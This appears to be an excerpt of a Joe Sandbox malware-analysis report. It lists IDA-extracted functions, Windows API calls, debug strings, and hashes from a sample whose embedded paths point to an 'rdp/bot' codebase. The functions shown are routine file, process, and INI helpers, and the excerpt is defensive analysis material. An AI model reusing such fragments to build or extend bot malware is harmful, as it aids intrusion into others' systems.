fs_dir_create, xrefs: 00007FF73AFB40CE, 00007FF73AFB4102, 00007FF73AFB4199, 00007FF73AFB42BF, 00007FF73AFB4326
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF73AFB4109

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: bdbd2f3d48ca3bfda7a2ab80e5ee397aeca65cf24444975c7d8aa5d157a93beb
Instruction ID: 0344cdbd7d27ed69c63a879da43b456326921069170823eb33592504cee4242b
Opcode Fuzzy Hash: bdbd2f3d48ca3bfda7a2ab80e5ee397aeca65cf24444975c7d8aa5d157a93beb
Instruction Fuzzy Hash: 4971B21DE0CB43B2FB207B05E9867B9D260AF68785FD405B2C94E476D1DE2CE845B321

Function 00007FF73AFB341C Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 00007FF73AFB3436
WaitForSingleObject.KERNEL32 ref: 00007FF73AFB345A
GetExitCodeProcess.KERNEL32 ref: 00007FF73AFB3468
GetLastError.KERNEL32 ref: 00007FF73AFB350F
TerminateProcess.KERNEL32 ref: 00007FF73AFB35FC
GetLastError.KERNEL32 ref: 00007FF73AFB360A
GetLastError.KERNEL32 ref: 00007FF73AFB36F1

Part of subcall function 00007FF73AFB33C0: CloseHandle.KERNEL32 ref: 00007FF73AFB33D8
Part of subcall function 00007FF73AFB33C0: CloseHandle.KERNEL32 ref: 00007FF73AFB33DE

Strings

[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF73AFB3525
[E] (%s) -> Failed(pid=%lu,err=%08x), xrefs: 00007FF73AFB34F9
(pi != NULL), xrefs: 00007FF73AFB34BC
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF73AFB34B5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB34CA
[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF73AFB3705
[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu), xrefs: 00007FF73AFB3620
[I] (%s) -> Done(pid=%lu,exit_code=%08lx), xrefs: 00007FF73AFB349F
process_close, xrefs: 00007FF73AFB3498, 00007FF73AFB34C3, 00007FF73AFB34F2, 00007FF73AFB351E, 00007FF73AFB3619, 00007FF73AFB36FE

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
API String ID: 1879646588-710610406
Opcode ID: 0978e53b86eb1b34fd0641683b28ddc7cc1f42a78fcee23864b8b3086e17b44f
Instruction ID: 5a0f33e3d4e864ab3b9e001fbf29a0b35f8ca4c58983f19e7cb89be2bf1a917a
Opcode Fuzzy Hash: 0978e53b86eb1b34fd0641683b28ddc7cc1f42a78fcee23864b8b3086e17b44f
Instruction Fuzzy Hash: 48817F6EF8C617F1FB31BB1594422B8D260AF00794F9506F2CC5E57A94DEACEC41A361

Function 00007FF73AFB3909 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF73AFB392A
GetLastError.KERNEL32 ref: 00007FF73AFB3A0A

Strings

[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF73AFB3A1F
(attr != NULL), xrefs: 00007FF73AFB39E0
NULL, xrefs: 00007FF73AFB3B3A
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB397E
~, xrefs: 00007FF73AFB3A8E
fs_attr_get, xrefs: 00007FF73AFB3977, 00007FF73AFB39AE, 00007FF73AFB39E7, 00007FF73AFB3A18, 00007FF73AFB3B4C
P, xrefs: 00007FF73AFB3A93
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB39A0, 00007FF73AFB39D9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB39B5, 00007FF73AFB39EE
c, xrefs: 00007FF73AFB39D1
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF73AFB3B53
(path != NULL), xrefs: 00007FF73AFB39A7
, xrefs: 00007FF73AFB3A2B

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-3397184676
Opcode ID: 8acf1c4a5003d6893745fb25f49fd85cb21f8b19960d362f1fb10e72bd5083e8
Instruction ID: f52af233dc1083388771b6c7ac8766447fcc5c85953459040687b056c258b514
Opcode Fuzzy Hash: 8acf1c4a5003d6893745fb25f49fd85cb21f8b19960d362f1fb10e72bd5083e8
Instruction Fuzzy Hash: 9E51A2ACD8C707B5F6307B02A4823B8E2617F04B94FD107B2C99E06994EEADE545F321

Function 00007FF73AFB6776 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF73AFB67AA

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

GetLastError.KERNEL32 ref: 00007FF73AFB6909

Strings

(xpath_sz != NULL), xrefs: 00007FF73AFB686D
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB6803, 00007FF73AFB6836, 00007FF73AFB6866, 00007FF73AFB6896
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB6818, 00007FF73AFB684B, 00007FF73AFB687B, 00007FF73AFB68AB
((*xpath_sz) > 0), xrefs: 00007FF73AFB689D
fs_path_expand, xrefs: 00007FF73AFB67DE, 00007FF73AFB6811, 00007FF73AFB6844, 00007FF73AFB6874, 00007FF73AFB68A4, 00007FF73AFB68D6, 00007FF73AFB6917, 00007FF73AFB69E4
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF73AFB68DD
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF73AFB691E
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF73AFB69EB
(path != NULL), xrefs: 00007FF73AFB680A
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF73AFB67E5
(xpath != NULL), xrefs: 00007FF73AFB683D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: 6a491c82d6aa7b12143681e80979905013fa0238c388d3680cd4c7a609efb755
Instruction ID: cb139502b787aaa19763ca4166180d69d2f790bfdd53f53e8e7c9694455666fd
Opcode Fuzzy Hash: 6a491c82d6aa7b12143681e80979905013fa0238c388d3680cd4c7a609efb755
Instruction Fuzzy Hash: 0761AF2EE0CA47B1FE60BB01E8423B8A261AF54748FD855B2D54E47690DF3DE942B324

Function 00007FF73AFB65E3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF73AFB660E
strlen.MSVCRT ref: 00007FF73AFB6637
strlen.MSVCRT ref: 00007FF73AFB6643
strlen.MSVCRT ref: 00007FF73AFB6659

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB668C, 00007FF73AFB66BC, 00007FF73AFB66EC
(path_sz != NULL), xrefs: 00007FF73AFB66C3
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF73AFB673B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB66A1, 00007FF73AFB66D1, 00007FF73AFB6701
NULL, xrefs: 00007FF73AFB676D
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF73AFB666E
fs_path_temp, xrefs: 00007FF73AFB6667, 00007FF73AFB669A, 00007FF73AFB66CA, 00007FF73AFB66FA, 00007FF73AFB6734
(path != NULL), xrefs: 00007FF73AFB6693
((*path_sz) > 0), xrefs: 00007FF73AFB66F3

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: 22bc61e86a1493e8ad50fc23e1b8a3a56546f4b7d4cc11331462ee5137d2d567
Instruction ID: 47f3f9e2a3144ecbf80f51ac2f11efd02bdaa488b16f59840dafb8a319d00da7
Opcode Fuzzy Hash: 22bc61e86a1493e8ad50fc23e1b8a3a56546f4b7d4cc11331462ee5137d2d567
Instruction Fuzzy Hash: 4741716990DA43A1FE64BF51A4423F4E272BF50784FD846B2D58E0B695DF3CE506A320

Function 00007FF73AFBA3E1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF73AFBA4A6
GetProcessHeap.KERNEL32 ref: 00007FF73AFBA4B4
HeapAlloc.KERNEL32 ref: 00007FF73AFBA4C5
strlen.MSVCRT ref: 00007FF73AFBA4E3
GetProcessHeap.KERNEL32 ref: 00007FF73AFBA511
HeapFree.KERNEL32 ref: 00007FF73AFBA522

Strings

mem_alloc, xrefs: 00007FF73AFBA530
ini_get_bytes, xrefs: 00007FF73AFBA454, 00007FF73AFBA484
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF73AFBA537
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF73AFBA446, 00007FF73AFBA476
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFBA45B, 00007FF73AFBA48B
(buf_sz != NULL), xrefs: 00007FF73AFBA47D
(buf != NULL), xrefs: 00007FF73AFBA44D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3964590784
Opcode ID: 03fc47f102cfa2f258c5c13787973959b3ce9fc44d5bdba8ab39c8666eb55642
Instruction ID: ab21ff44bf0f9e828d06251d4d3d99e82a765d61a52e8436e468905bce527251
Opcode Fuzzy Hash: 03fc47f102cfa2f258c5c13787973959b3ce9fc44d5bdba8ab39c8666eb55642
Instruction Fuzzy Hash: 6B317329A0CB47A6FA61BF52E8063F5E760AF40B84FD801B1D98D07695DF7CE805A360

Function 00007FF73AFB3B64 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF73AFB3C3E

Part of subcall function 00007FF73AFB3909: GetFileAttributesA.KERNEL32 ref: 00007FF73AFB392A

SetFileAttributesA.KERNEL32 ref: 00007FF73AFB3BAB

Strings

fs_attr_set, xrefs: 00007FF73AFB3BD7, 00007FF73AFB3C02, 00007FF73AFB3C4E, 00007FF73AFB3D1D, 00007FF73AFB3D83
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB3BC9, 00007FF73AFB3BF4
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF73AFB3C55
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB3BDE, 00007FF73AFB3C09
(attr != NULL), xrefs: 00007FF73AFB3BFB
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FF73AFB3D24
NULL, xrefs: 00007FF73AFB3D74
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF73AFB3D8A
(path != NULL), xrefs: 00007FF73AFB3BD0

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3085771803
Opcode ID: b0c5002e8470a0b69f71e521630f808112feeb633aed8e2ce3caca7a6ec6d69d
Instruction ID: d5f870dffa6a2ca6c28e1618419adaae13082a8a3790a4fe3fb3e6f9b2007b63
Opcode Fuzzy Hash: b0c5002e8470a0b69f71e521630f808112feeb633aed8e2ce3caca7a6ec6d69d
Instruction Fuzzy Hash: 5151D869A4C707B5F730BB51D4822B9F2B0AF04384FD047B2D99E46A95DEACE844F721

Function 00007FF73AFB6263 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32 ref: 00007FF73AFB62AB
CloseHandle.KERNEL32 ref: 00007FF73AFB62BC

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

GetLastError.KERNEL32 ref: 00007FF73AFB6372

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB62EC, 00007FF73AFB631D
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FF73AFB6324
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB6301, 00007FF73AFB6332
[I] (%s) -> Done(lock=%p), xrefs: 00007FF73AFB62CC
fs_file_unlock, xrefs: 00007FF73AFB62C5, 00007FF73AFB62FA, 00007FF73AFB632B, 00007FF73AFB6356, 00007FF73AFB6380
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FF73AFB635D
(lock != NULL), xrefs: 00007FF73AFB62F3
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FF73AFB6387

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-1436771859
Opcode ID: fe1f050fa24a5335d086f1362eb8feab9bac3c886b13072f2e9196b0b082f1e9
Instruction ID: 0a76060132d84e1c15df1256dffb7ce2e89b1abd70f0b6150752d59c67bcd9cb
Opcode Fuzzy Hash: fe1f050fa24a5335d086f1362eb8feab9bac3c886b13072f2e9196b0b082f1e9
Instruction Fuzzy Hash: 2841B36AF0CA83F0FEB0B715E452AB8D260AF61798FD402B2C45E076D5DE3CE545A325

Function 00007FF73AFB8008 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF73AFB8019
GetProcessHeap.KERNEL32 ref: 00007FF73AFB804F
HeapAlloc.KERNEL32 ref: 00007FF73AFB8063
wcslen.MSVCRT ref: 00007FF73AFB8080
GetProcessHeap.KERNEL32 ref: 00007FF73AFB8093
HeapAlloc.KERNEL32 ref: 00007FF73AFB80A7
memcpy.MSVCRT ref: 00007FF73AFB80CF

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

Part of subcall function 00007FF73AFB14E2: EnterCriticalSection.KERNEL32 ref: 00007FF73AFB15B3
Part of subcall function 00007FF73AFB14E2: LeaveCriticalSection.KERNEL32 ref: 00007FF73AFB15DB
Part of subcall function 00007FF73AFB14E2: CopyFileA.KERNEL32 ref: 00007FF73AFB1638

GetProcessHeap.KERNEL32 ref: 00007FF73AFB8114
HeapFree.KERNEL32 ref: 00007FF73AFB8125

Strings

mem_alloc, xrefs: 00007FF73AFB80DF, 00007FF73AFB80FA
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF73AFB80E6, 00007FF73AFB8101

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
API String ID: 4155868088-3920367287
Opcode ID: 7bcd59ad198253b387941de4e3b697e80dc4259fd0b82a52b92a8f49e780f28c
Instruction ID: 77e60f27ec6b41102a9e1162a6d6cbf4ece78cec49da240d4b7868467e2e7c62
Opcode Fuzzy Hash: 7bcd59ad198253b387941de4e3b697e80dc4259fd0b82a52b92a8f49e780f28c
Instruction Fuzzy Hash: 7931413D649747A1F720BB06E442779A370AB88BC4F8444B1CA8E47395DE3DE945E360

Function 00007FF73AFB6A5C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF73AFB6A8B
GetLastError.KERNEL32 ref: 00007FF73AFB6A96

Strings

[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF73AFB6AEE
(hnd != NULL), xrefs: 00007FF73AFB6B14
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB6B0D, 00007FF73AFB6B3D, 00007FF73AFB6B70
(path_sz != NULL), xrefs: 00007FF73AFB6B77
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB6B22, 00007FF73AFB6B52, 00007FF73AFB6B85
wfpblk.lock, xrefs: 00007FF73AFB6A5C
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF73AFB6AB5
(path != NULL), xrefs: 00007FF73AFB6B44
fs_module_path, xrefs: 00007FF73AFB6AAE, 00007FF73AFB6AE7, 00007FF73AFB6B1B, 00007FF73AFB6B4B, 00007FF73AFB6B7E

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
API String ID: 2776309574-2006444783
Opcode ID: e091a9b40aa408c73ba7d42a196dea1f68ce83149365551fa48ab49a88a7c95c
Instruction ID: 0761ac4674be1d7973ec28dee03b9c83212958ce73c4a0f9b938eb7be18a55ae
